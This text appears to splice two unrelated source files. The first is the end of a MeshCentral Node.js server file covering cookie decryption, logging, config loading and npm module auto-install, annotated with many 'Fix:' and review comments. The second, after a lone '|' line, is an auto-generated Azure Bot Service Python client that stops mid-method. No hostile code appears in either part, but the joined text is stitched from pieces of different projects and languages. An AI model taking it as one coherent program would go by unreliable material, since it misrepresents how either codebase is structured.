        if (key == null) { key = obj.serverKey; }
        // Undo the cookie-safe character swap done by encodeCookie, then decode to bytes.
        cookie = Buffer.from(cookie.replace(/\@/g, '+').replace(/\$/g, '/'), obj.args.cookieencoding ? obj.args.cookieencoding : 'base64');
        // Cookie layout (see encodeCookie): 12 byte IV, 16 byte GCM auth tag, ciphertext from offset 28.
        const decipher = obj.crypto.createDecipheriv('aes-256-gcm', key.slice(0, 32), cookie.slice(0, 12));
        decipher.setAuthTag(cookie.slice(12, 28)); // Fix: the auth tag spans bytes 12..28 (16 bytes); slice(12, 16) only took 4 bytes and does not match what encodeCookie wrote.
        const o = JSON.parse(decipher.update(cookie.slice(28), 'binary', 'utf8') + decipher.final('utf8'));
        if ((o.time == null) || (typeof o.time != 'number')) { obj.debug('cookie', 'ERR: Bad cookie due to invalid time'); return null; } // Fix: the second clause duplicated the null test instead of checking the type.
        o.time = o.time * 1000; // Decode the cookie creation time
        o.dtime = Date.now() - o.time; // Decode how long ago the cookie was created (in milliseconds)
        if ((o.expire == null) || (typeof o.expire != 'number')) {
            // Use a fixed cookie expire time
            if (timeout == null) { timeout = 2; }
            if ((o.dtime > (timeout * 60000)) || (o.dtime < -30000)) { obj.debug('cookie', 'ERR: Bad cookie due to timeout'); return null; } // The cookie is only valid "timeout" minutes forward, or 30 seconds back in time (in case other server's clock is not quite right)
        } else {
            // An expire time is included in the cookie (in minutes), use this. Zero means no expiration.
            if ((o.expire !== 0) && ((o.dtime > (o.expire * 60000)) || (o.dtime < -30000))) { obj.debug('cookie', 'ERR: Bad cookie due to timeout'); return null; }
        }
        obj.debug('cookie', 'Decoded AESGCM cookie: ' + JSON.stringify(o));
        return o;
    } catch (ex) { obj.debug('cookie', 'ERR: Bad AESGCM cookie due to exception: ' + ex); return null; }
};
// Decode a cookie back into an object using a key using AES256 / HMAC-SHA384. Return null if it's not a valid cookie. (key must be 80 bytes or more)
// We do this because poor .NET does not support AES256-GCM.
obj.decodeCookieAESSHA = function (cookie, key, timeout) {
    try {
        if (key == null) { key = obj.serverKey; }
        if (key.length < 80) { return null; } // Need 48 bytes of HMAC key plus 32 bytes of AES key.
        cookie = Buffer.from(cookie.replace(/\@/g, '+').replace(/\$/g, '/'), obj.args.cookieencoding ? obj.args.cookieencoding : 'base64');
        // Layout: 16 byte AES-CBC IV, then the ciphertext of (48 byte HMAC-SHA384 | JSON payload).
        const decipher = obj.crypto.createDecipheriv('aes-256-cbc', key.slice(48, 80), cookie.slice(0, 16));
        const rawmsg = decipher.update(cookie.slice(16), 'binary', 'binary') + decipher.final('binary');
        const hmac = obj.crypto.createHmac('sha384', key.slice(0, 48));
        hmac.update(rawmsg.slice(48), 'binary'); // 'binary' so the latin1 string round-trips to the original bytes.
        // Fix: Buffer.compare() returns -1/0/1 with 0 meaning equal; the old "== false" test was inverted,
        // rejecting cookies whose HMAC matched and letting mismatched ones continue. Also use the 'binary'
        // encoding when rebuilding the stored MAC bytes instead of the utf8 default.
        if (Buffer.compare(hmac.digest(), Buffer.from(rawmsg.slice(0, 48), 'binary')) != 0) { return null; }
        const o = JSON.parse(Buffer.from(rawmsg.slice(48), 'binary').toString('utf8')); // Fix: String.toString() ignores the 'utf8' argument; decode the bytes explicitly so non-ASCII payloads parse correctly.
        if ((o.time == null) || (typeof o.time != 'number')) { obj.debug('cookie', 'ERR: Bad cookie due to invalid time'); return null; } // Fix: the second clause duplicated the null test instead of checking the type.
        o.time = o.time * 1000; // Decode the cookie creation time
        o.dtime = Date.now() - o.time; // Decode how long ago the cookie was created (in milliseconds)
        if ((o.expire == null) || (typeof o.expire != 'number')) {
            // Use a fixed cookie expire time
            if (timeout == null) { timeout = 2; }
            if ((o.dtime > (timeout * 60000)) || (o.dtime < -30000)) { obj.debug('cookie', 'ERR: Bad cookie due to timeout'); return null; } // The cookie is only valid "timeout" minutes forward, or 30 seconds back in time (in case other server's clock is not quite right)
        } else {
            // An expire time is included in the cookie (in minutes), use this. Zero means no expiration.
            if ((o.expire !== 0) && ((o.dtime > (o.expire * 60000)) || (o.dtime < -30000))) { obj.debug('cookie', 'ERR: Bad cookie due to timeout'); return null; }
        }
        obj.debug('cookie', 'Decoded AESSHA cookie: ' + JSON.stringify(o));
        return o;
    } catch (ex) { obj.debug('cookie', 'ERR: Bad AESSHA cookie due to exception: ' + ex); return null; }
};
// Debug logging. "source" selects the debug channel (e.g. 'main', 'cookie'); the remaining
// arguments form the log line. Depending on configuration the event goes to the console,
// to log.txt in the data folder, and/or to logged-in full administrators over websocket.
obj.debug = function (source, ...args) {
    // Send event to console
    if ((obj.debugSources != null) && ((obj.debugSources == '*') || (obj.debugSources.indexOf(source) >= 0))) { console.log(source.toUpperCase() + ':', ...args); }
    // Send event to log file
    if (obj.config.settings && obj.config.settings.log) {
        if (typeof obj.args.log == 'string') { obj.args.log = obj.args.log.split(','); } // Normalize a "a,b,c" string into an array once.
        if (obj.args.log.indexOf(source) >= 0) {
            const d = new Date();
            if (obj.xxLogFile == null) {
                try {
                    obj.xxLogFile = obj.fs.openSync(obj.getConfigFilePath('log.txt'), 'a+', 0o666); // Fix: the mode must be octal 666 (rw-rw-rw-); decimal 666 produces unintended permission bits.
                    obj.fs.writeSync(obj.xxLogFile, '---- Log start at ' + new Date().toLocaleString() + ' ----\r\n');
                    obj.xxLogDateStr = d.toLocaleDateString();
                } catch (ex) { }
            }
            if (obj.xxLogFile != null) {
                try {
                    // Write a date separator line whenever the day changes.
                    if (obj.xxLogDateStr != d.toLocaleDateString()) { obj.xxLogDateStr = d.toLocaleDateString(); obj.fs.writeSync(obj.xxLogFile, '---- ' + d.toLocaleDateString() + ' ----\r\n'); }
                    obj.fs.writeSync(obj.xxLogFile, new Date().toLocaleTimeString() + ' - ' + source + ': ' + args.join('') + '\r\n'); // Fix: "args" is already an array; Array.prototype.slice.call(...args) sliced the first argument instead of the argument list.
                } catch (ex) { }
            }
        }
    }
    // Send the event to logged in administrators
    if ((obj.debugRemoteSources != null) && ((obj.debugRemoteSources == '*') || (obj.debugRemoteSources.indexOf(source) >= 0))) {
        var sendcount = 0;
        for (var sessionid in obj.webserver.wssessions2) {
            var ws = obj.webserver.wssessions2[sessionid];
            if ((ws != null) && (ws.userid != null)) {
                var user = obj.webserver.users[ws.userid];
                // Only full site administrators (siteadmin == 0xFFFFFFFF) receive trace events.
                if ((user != null) && (user.siteadmin == 4294967295)) {
                    try { ws.send(JSON.stringify({ action: 'trace', source: source, args: args, time: Date.now() })); sendcount++; } catch (ex) { }
                }
            }
        }
        if (sendcount == 0) { obj.debugRemoteSources = null; } // If there are no listeners, remove debug sources.
    }
};
// Update server state. Writes a server state file.
var meshServerState = {}; // Last known name -> value pairs written to serverstate.txt.
// Set a server state value and rewrite serverstate.txt in the data folder. Calling with a null
// name or value just rewrites the file from the current state. All failures are swallowed; a
// write failure additionally flags that the server cannot update its own files.
obj.updateServerState = function (name, val) {
    try {
        if ((name != null) && (val != null)) {
            // Fix: simplified the change detection. The previous code nested a delete branch
            // for "val == null" that was unreachable here (val is known non-null in this block).
            if (meshServerState[name] == val) return; // Value unchanged, don't rewrite the file.
            meshServerState[name] = val;
        }
        var r = 'time=' + Date.now() + '\r\n';
        for (var i in meshServerState) { r += (i + '=' + meshServerState[i] + '\r\n'); }
        try {
            obj.fs.writeFileSync(obj.getConfigFilePath('serverstate.txt'), r); // Try to write the server state, this may fail if we don't have permission.
        } catch (ex) { obj.serverSelfWriteAllowed = false; }
    } catch (ex) { } // Do nothing since this is not a critical feature.
};
// Logging functions: write to the OS service log when one is configured and mirror to the console.
function logException(e) { e += ''; logErrorEvent(e); } // Coerce the exception to a string, then log it as an error.
function logInfoEvent(msg) { if (obj.servicelog != null) { obj.servicelog.info(msg); } console.log(msg); }
function logWarnEvent(msg) { if (obj.servicelog != null) { obj.servicelog.warn(msg); } console.log(msg); }
function logErrorEvent(msg) { if (obj.servicelog != null) { obj.servicelog.error(msg); } console.error(msg); }
// Server warnings are accumulated in serverWarnings so they can be fetched later.
obj.getServerWarnings = function () { return serverWarnings; }
obj.addServerWarning = function(msg, print) { serverWarnings.push(msg); if (print !== false) { console.log("WARNING: " + msg); } }
// auth.log functions
// Write an authentication event to syslog (when configured) and/or the auth log file, using a
// syslog-style "Mon DD HH:MM:SS host process[pid]: message" line.
obj.authLog = function (server, msg) {
    if (typeof msg != 'string') return;
    if (obj.syslogauth != null) { try { obj.syslogauth.log(obj.syslogauth.LOG_INFO, msg); } catch (ex) { } }
    if (obj.authlogfile != null) { // Write authlog to file
        try {
            var d = new Date(), month = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'][d.getMonth()];
            // Fix: zero-pad the seconds too; hours and minutes were padded but seconds were not,
            // yielding lines like "12:05:7" instead of the syslog-style "12:05:07". Also use a new
            // local instead of re-declaring "var msg", which shadowed the parameter.
            var line = month + ' ' + d.getDate() + ' ' + obj.common.zeroPad(d.getHours(), 2) + ':' + obj.common.zeroPad(d.getMinutes(), 2) + ':' + obj.common.zeroPad(d.getSeconds(), 2) + ' meshcentral ' + server + '[' + process.pid + ']: ' + msg + ((obj.platform == 'win32') ? '\r\n' : '\n');
            obj.fs.write(obj.authlogfile, line, function (err, written, string) { });
        } catch (ex) { }
    }
}
// Return the path of a file into the meshcentral-data path
// A "configfiles" section in the configuration may remap an individual file name to an explicit
// path; otherwise the file is resolved inside the data folder.
obj.getConfigFilePath = function (filename) {
    var remapped = ((obj.config != null) && (obj.config.configfiles != null)) ? obj.config.configfiles[filename] : null;
    if ((remapped != null) && (typeof remapped == 'string')) { return remapped; }
    return obj.path.join(obj.datapath, filename);
};
return obj;
}
// Resolve a list of names, call back with list of failed resolves.
// func receives an array of the names that failed to resolve, or null when all resolved.
// Note: func is never called when "names" is empty.
function checkResolveAll(names, func) {
    var dns = require('dns');
    var pending = names.length, failed = null;
    for (var ix in names) {
        (function (hostname) {
            dns.resolve(hostname, function (err, records) {
                if (err != null) { if (failed == null) { failed = [hostname]; } else { failed.push(hostname); } }
                if (--pending == 0) { func(failed); } // Last resolution finished, report the result.
            });
        })(names[ix]);
    }
}
// Return the server configuration
// Locates the meshcentral-data folder (beside the node_modules tree when installed as a module),
// loads config.json from it when present, folds the command line arguments into config.settings,
// and lower-cases the configuration keys. Returns null when the configuration file cannot be
// parsed or contains an invalid domain name.
function getConfig(createSampleConfig) {
// Figure out the datapath location
var i, fs = require('fs'), path = require('path'), datapath = null;
var args = require('minimist')(process.argv.slice(2));
// When running from inside node_modules, the data folder sits two levels up, next to node_modules.
if ((__dirname.endsWith('/node_modules/meshcentral')) || (__dirname.endsWith('\\node_modules\\meshcentral')) || (__dirname.endsWith('/node_modules/meshcentral/')) || (__dirname.endsWith('\\node_modules\\meshcentral\\'))) {
datapath = path.join(__dirname, '../../meshcentral-data');
} else {
datapath = path.join(__dirname, '../meshcentral-data');
}
if (args.datapath) { datapath = args.datapath; } // --datapath overrides the computed location.
try { fs.mkdirSync(datapath); } catch (e) { } // Create the data folder if missing; ignore "already exists".
// Read configuration file if present and change arguments.
var config = {}, configFilePath = path.join(datapath, 'config.json');
if (fs.existsSync(configFilePath)) {
// Load and validate the configuration file (require() parses the JSON and throws on a syntax error).
try { config = require(configFilePath); } catch (e) { console.log('ERROR: Unable to parse ' + configFilePath + '.'); return null; }
if (config.domains == null) { config.domains = {}; }
for (i in config.domains) { if ((i.split('/').length > 1) || (i.split(' ').length > 1)) { console.log("ERROR: Error in config.json, domain names can't have spaces or /."); return null; } }
} else {
if (createSampleConfig === true) {
// Copy the "sample-config.json" to give users a starting point
// NOTE(review): this copy is asynchronous, so config.json may not be fully written by the
// time this function returns - confirm callers tolerate that.
var sampleConfigPath = path.join(__dirname, 'sample-config.json');
if (fs.existsSync(sampleConfigPath)) { fs.createReadStream(sampleConfigPath).pipe(fs.createWriteStream(configFilePath)); }
}
}
// Set the command line arguments to the config file if they are not present
if (!config.settings) { config.settings = {}; }
for (i in args) { config.settings[i] = args[i]; }
// Lower case all keys in the config file
try {
require('./common.js').objKeysToLower(config, ['ldapoptions', 'defaultuserwebstate', 'forceduserwebstate']);
} catch (ex) {
console.log('CRITICAL ERROR: Unable to access the file \"./common.js\".\r\nCheck folder & file permissions.');
process.exit();
}
return config;
}
// Check if a list of modules are present and install any missing ones.
// Modules may carry a version tag ("foobar@1.0.0"); a mismatched installed
// version counts as missing. Calls func() once every module is available.
function InstallModules(modules, func) {
    var missingModules = [];
    if (modules.length > 0) {
        var dependencies = require('./package.json').dependencies;
        for (var i in modules) {
            // Modules may contain a version tag (foobar@1.0.0), remove it so the module can be found using require
            var moduleNameAndVersion = modules[i];
            var moduleInfo = moduleNameAndVersion.split('@', 2);
            var moduleName = moduleInfo[0];
            var moduleVersion = moduleInfo[1];
            try {
                // Does the module need a specific version?
                if (moduleVersion) {
                    if (require(`${moduleName}/package.json`).version != moduleVersion) { throw new Error(); }
                } else {
                    // Is the module in package.json? Install exact version.
                    // FIX: compare typeof against the string 'undefined'; the original
                    // compared against the undefined value itself, which is always true.
                    if (typeof dependencies[moduleName] !== 'undefined') { moduleVersion = dependencies[moduleName]; }
                    require(moduleName);
                }
            } catch (e) {
                // Only queue for install if a prior install attempt did not already succeed,
                // otherwise a persistently un-requirable module would loop forever.
                if (previouslyInstalledModules[modules[i]] !== true) { missingModules.push(moduleNameAndVersion); }
            }
        }
        // Install one missing module, then re-enter this function to re-check the rest.
        if (missingModules.length > 0) { InstallModule(missingModules.shift(), InstallModules, modules, func); } else { func(); }
    } else {
        // FIX: an empty module list previously never invoked the continuation.
        func();
    }
}
// Install a single npm module into the correct working directory, then call
// func(tag1, tag2) on success. Exits the process if npm fails.
function InstallModule(modulename, func, tag1, tag2) {
    console.log('Installing ' + modulename + '...');
    var child_process = require('child_process');
    var parentpath = __dirname;

    // Get the working directory: when running from inside node_modules, install into the parent project.
    if ((__dirname.endsWith('/node_modules/meshcentral')) || (__dirname.endsWith('\\node_modules\\meshcentral')) || (__dirname.endsWith('/node_modules/meshcentral/')) || (__dirname.endsWith('\\node_modules\\meshcentral\\'))) { parentpath = require('path').join(__dirname, '../..'); }

    // NOTE(review): modulename is interpolated into a shell command line. Callers pass
    // hard-coded module names from mainStart(); never feed user input into this function.
    child_process.exec(npmpath + ` install --no-optional ${modulename}`, { maxBuffer: 512000, timeout: 120000, cwd: parentpath }, function (error, stdout, stderr) {
        if ((error != null) && (error != '')) {
            // FIX: corrected spelling in the user-facing message ("sufficient", "manually").
            console.log('ERROR: Unable to install required module "' + modulename + '". MeshCentral may not have access to npm, or npm may not have sufficient rights to load the new module. Try "npm install ' + modulename + '" to manually install this module.\r\n');
            process.exit();
            return;
        }
        // Remember the successful install so InstallModules does not retry it endlessly.
        previouslyInstalledModules[modulename] = true;
        func(tag1, tag2);
        return;
    });
}
// Detect CTRL-C on Linux and stop nicely
process.on('SIGINT', function () { if (meshserver != null) { meshserver.Stop(); meshserver = null; } console.log('Server Ctrl-C exit...'); process.exit(); });

// Add a server warning, warnings will be shown to the administrator on the web application.
var serverWarnings = [];
// print defaults to true; pass false to queue the warning without echoing it to the console.
function addServerWarning(msg, print) { serverWarnings.push(msg); if (print !== false) { console.log("WARNING: " + msg); } }
// Load the really basic modules
var npmpath = 'npm';                     // Command used to invoke npm; refined in mainStart().
var meshserver = null;                   // Main MeshCentral server object once started.
var childProcess = null;                 // Optional child process, killed on exit.
var previouslyInstalledModules = {};     // Modules installed this run (guards against install loops).
// Server bootstrap: verify the Node version, locate npm, load the configuration,
// compute the list of required npm modules from the configuration, install any
// that are missing, then create and start the MeshCentral server.
function mainStart() {
    // Check the NodeJS is version 6 or better.
    if (Number(process.version.match(/^v(\d+\.\d+)/)[1]) < 6) { console.log("MeshCentral requires Node v6 or above, current version is " + process.version + "."); return; }
    // If running within the node_modules folder, move working directory to the parent of the node_modules folder.
    if (__dirname.endsWith('\\node_modules\\meshcentral') || __dirname.endsWith('/node_modules/meshcentral')) { process.chdir(require('path').join(__dirname, '..', '..')); }
    // Check for any missing modules.
    InstallModules(['minimist'], function () {
        // Parse inbound arguments
        var args = require('minimist')(process.argv.slice(2));
        // Setup the NPM path: look for an npm binary next to the node binary,
        // quoting paths that contain spaces.
        if (args.npmpath == null) {
            try {
                var xnodepath = process.argv[0];
                var xnpmpath = require('path').join(require('path').dirname(process.argv[0]), 'npm');
                if (require('fs').existsSync(xnodepath) && require('fs').existsSync(xnpmpath)) {
                    if (xnodepath.indexOf(' ') >= 0) { xnodepath = '"' + xnodepath + '"'; }
                    if (xnpmpath.indexOf(' ') >= 0) { xnpmpath = '"' + xnpmpath + '"'; }
                    // On non-Windows platforms npm is a script, so it is run through node itself.
                    if (require('os').platform() == 'win32') { npmpath = xnpmpath; } else { npmpath = (xnodepath + ' ' + xnpmpath); }
                }
            } catch (ex) { console.log(ex); }
        } else {
            npmpath = args.npmpath;
        }
        // Get the server configuration
        var config = getConfig(false);
        if (config == null) { process.exit(); }
        // Lowercase the auth value if present
        for (var i in config.domains) { if (typeof config.domains[i].auth == 'string') { config.domains[i].auth = config.domains[i].auth.toLowerCase(); } }
        // Check if Windows SSPI and YubiKey OTP will be used
        var sspi = false;
        var ldap = false;
        var allsspi = true;
        var yubikey = false;
        var recordingIndex = false;
        var domainCount = 0;
        // allsspi stays true only on Windows when every configured domain uses SSPI auth.
        if (require('os').platform() == 'win32') { for (var i in config.domains) { domainCount++; if (config.domains[i].auth == 'sspi') { sspi = true; } else { allsspi = false; } } } else { allsspi = false; }
        if (domainCount == 0) { allsspi = false; }
        for (var i in config.domains) {
            if (config.domains[i].yubikey != null) { yubikey = true; }
            if (config.domains[i].auth == 'ldap') { ldap = true; }
            if ((config.domains[i].sessionrecording != null) && (config.domains[i].sessionrecording.index == true)) { recordingIndex = true; }
        }
        // Get the current node version
        var nodeVersion = Number(process.version.match(/^v(\d+\.\d+)/)[1]);
        // Build the list of required modules based on the configuration.
        var modules = ['ws', 'cbor', 'nedb', 'https', 'yauzl', 'xmldom', 'ipcheck', 'express', 'archiver', 'multiparty', 'node-forge', 'express-ws', 'compression', 'body-parser', 'connect-redis', 'cookie-session', 'express-handlebars'];
        if (require('os').platform() == 'win32') { modules.push('node-windows'); if (sspi == true) { modules.push('node-sspi'); } } // Add Windows modules
        if (ldap == true) { modules.push('ldapauth-fork'); }
        if (recordingIndex == true) { modules.push('image-size'); } // Need to get the remote desktop JPEG sizes to index the recording file.
        if (config.letsencrypt != null) { if (nodeVersion < 8) { addServerWarning("Let's Encrypt support requires Node v8.x or higher.", !args.launch); } else { modules.push('acme-client'); } } // Add acme-client module
        if (config.settings.mqtt != null) { modules.push('aedes'); } // Add MQTT Modules
        if (config.settings.mysql != null) { modules.push('mysql'); } // Add MySQL, official driver.
        if (config.settings.mongodb != null) { modules.push('mongodb'); } // Add MongoDB, official driver.
        if (config.settings.mariadb != null) { modules.push('mariadb'); } // Add MariaDB, official driver.
        if (config.settings.vault != null) { modules.push('node-vault'); } // Add official HashiCorp's Vault module.
        if (config.settings.plugins != null) { modules.push('semver'); } // Required for version compat testing and update checks
        if ((config.settings.plugins != null) && (config.settings.plugins.proxy != null)) { modules.push('https-proxy-agent'); } // Required for HTTP/HTTPS proxy support
        // NOTE(review): this "else if" chains the xmongodb check to the plugins-proxy
        // condition above, so mongojs is skipped whenever plugins.proxy is set.
        // That looks unintended (it probably belongs after the mongodb check) — confirm.
        else if (config.settings.xmongodb != null) { modules.push('mongojs'); } // Add MongoJS, old driver.
        if (config.smtp != null) { modules.push('nodemailer'); } // Add SMTP support
        if (args.translate) { modules.push('jsdom'); modules.push('esprima'); modules.push('minify-js'); modules.push('html-minifier'); } // Translation support
        // If running NodeJS < 8, install "util.promisify"
        if (nodeVersion < 8) { modules.push('util.promisify'); }
        // Setup encrypted zip support if needed
        if (config.settings.autobackup && config.settings.autobackup.zippassword) { modules.push('archiver-zip-encrypted'); }
        // Setup 2nd factor authentication
        if (config.settings.no2factorauth !== true) {
            // Setup YubiKey OTP if configured
            if (yubikey == true) { modules.push('yubikeyotp'); } // Add YubiKey OTP support
            if (allsspi == false) { modules.push('otplib@10.2.3'); } // Google Authenticator support (v10 supports older NodeJS versions).
        }
        // Syslog support
        if ((require('os').platform() != 'win32') && (config.settings.syslog || config.settings.syslogjson)) { modules.push('modern-syslog'); }
        // Setup heapdump support if needed, useful for memory leak debugging
        // https://www.arbazsiddiqui.me/a-practical-guide-to-memory-leaks-in-nodejs/
        if (config.settings.heapdump === true) { modules.push('heapdump'); }
        // Install any missing modules and launch the server
        InstallModules(modules, function () { meshserver = CreateMeshCentralServer(config, args); meshserver.Start(); });
        // On exit, also terminate the child process if applicable
        process.on('exit', function () { if (childProcess) { childProcess.kill(); childProcess = null; } });
        // If our parent exits, we also exit: --launch means we were spawned by a
        // supervisor process, so treat closure of any std stream as a shutdown signal.
        if (args.launch) {
            process.stderr.on('end', function () { process.exit(); });
            process.stdout.on('end', function () { process.exit(); });
            process.stdin.on('end', function () { process.exit(); });
            process.stdin.on('data', function (data) { });
        }
    });
}
// Entry point: start the server when run directly, otherwise export mainStart.
if (require.main === module) {
    mainStart(); // Called directly, launch normally.
} else {
    module.exports.mainStart = mainStart; // Required as a module, useful for winservice.js
}
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
    # pylint: disable=unused-import,ungrouped-imports
    from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union

    T = TypeVar('T')
    # Type of the optional "cls" callback accepted by every operation: it receives the
    # pipeline response, the deserialized body and the response headers dict.
    ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class BotConnectionOperations(object):
    """BotConnectionOperations operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.botservice.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    # NOTE: AutoRest-generated code — keep edits to comments only; regeneration
    # will discard hand changes.
    models = _models

    def __init__(self, client, config, serializer, deserializer):
        # Pipeline client used to build and send HTTP requests.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    def list_service_providers(
        self,
        **kwargs  # type: Any
    ):
        # type: (...) -> "_models.ServiceProviderResponseList"
        """Lists the available Service Providers for creating Connection Settings.

        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ServiceProviderResponseList, or the result of cls(response)
        :rtype: ~azure.mgmt.botservice.models.ServiceProviderResponseList
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ServiceProviderResponseList"]
        # Map well-known HTTP status codes to specific azure-core exception types;
        # callers may extend/override via the "error_map" kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-02"
        accept = "application/json"

        # Construct URL
        url = self.list_service_providers.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        # The service exposes this list operation as a POST.
        request = self._client.post(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        deserialized = self._deserialize('ServiceProviderResponseList', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    list_service_providers.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.BotService/listAuthServiceProviders'}  # type: ignore

    def list_with_secrets(
        self,
        resource_group_name,  # type: str
        resource_name,  # type: str
        connection_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> "_models.ConnectionSetting"
        """Get a Connection Setting registration for a Bot Service.

        :param resource_group_name: The name of the Bot resource group in the user subscription.
        :type resource_group_name: str
        :param resource_name: The name of the Bot resource.
        :type resource_name: str
        :param connection_name: The name of the Bot Service Connection Setting resource.
        :type connection_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ConnectionSetting, or the result of cls(response)
        :rtype: ~azure.mgmt.botservice.models.ConnectionSetting
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ConnectionSetting"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-02"
        accept = "application/json"

        # Construct URL
        url = self.list_with_secrets.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
            'resourceName': self._serialize.url("resource_name", resource_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
            'connectionName': self._serialize.url("connection_name", connection_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][\sa-zA-Z0-9_.-]*$'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        # POST (not GET) because the response contains connection secrets.
        request = self._client.post(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        deserialized = self._deserialize('ConnectionSetting', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    list_with_secrets.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.BotService/botServices/{resourceName}/Connections/{connectionName}/listWithSecrets'}  # type: ignore

    def create(
        self,
        resource_group_name,  # type: str
        resource_name,  # type: str
        connection_name,  # type: str
        parameters,  # type: "_models.ConnectionSetting"
        **kwargs  # type: Any
    ):
        # type: (...) -> "_models.ConnectionSetting"
        """Register a new Auth Connection for a Bot Service.

        :param resource_group_name: The name of the Bot resource group in the user subscription.
        :type resource_group_name: str
        :param resource_name: The name of the Bot resource.
        :type resource_name: str
        :param connection_name: The name of the Bot Service Connection Setting resource.
        :type connection_name: str
        :param parameters: The parameters to provide for creating the Connection Setting.
        :type parameters: ~azure.mgmt.botservice.models.ConnectionSetting
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ConnectionSetting, or the result of cls(response)
        :rtype: ~azure.mgmt.botservice.models.ConnectionSetting
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ConnectionSetting"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-02"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self.create.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
            'resourceName': self._serialize.url("resource_name", resource_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
            'connectionName': self._serialize.url("connection_name", connection_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][\sa-zA-Z0-9_.-]*$'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        # Serialize the request body and send the PUT (create/replace) request.
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(parameters, 'ConnectionSetting')
        body_content_kwargs['content'] = body_content
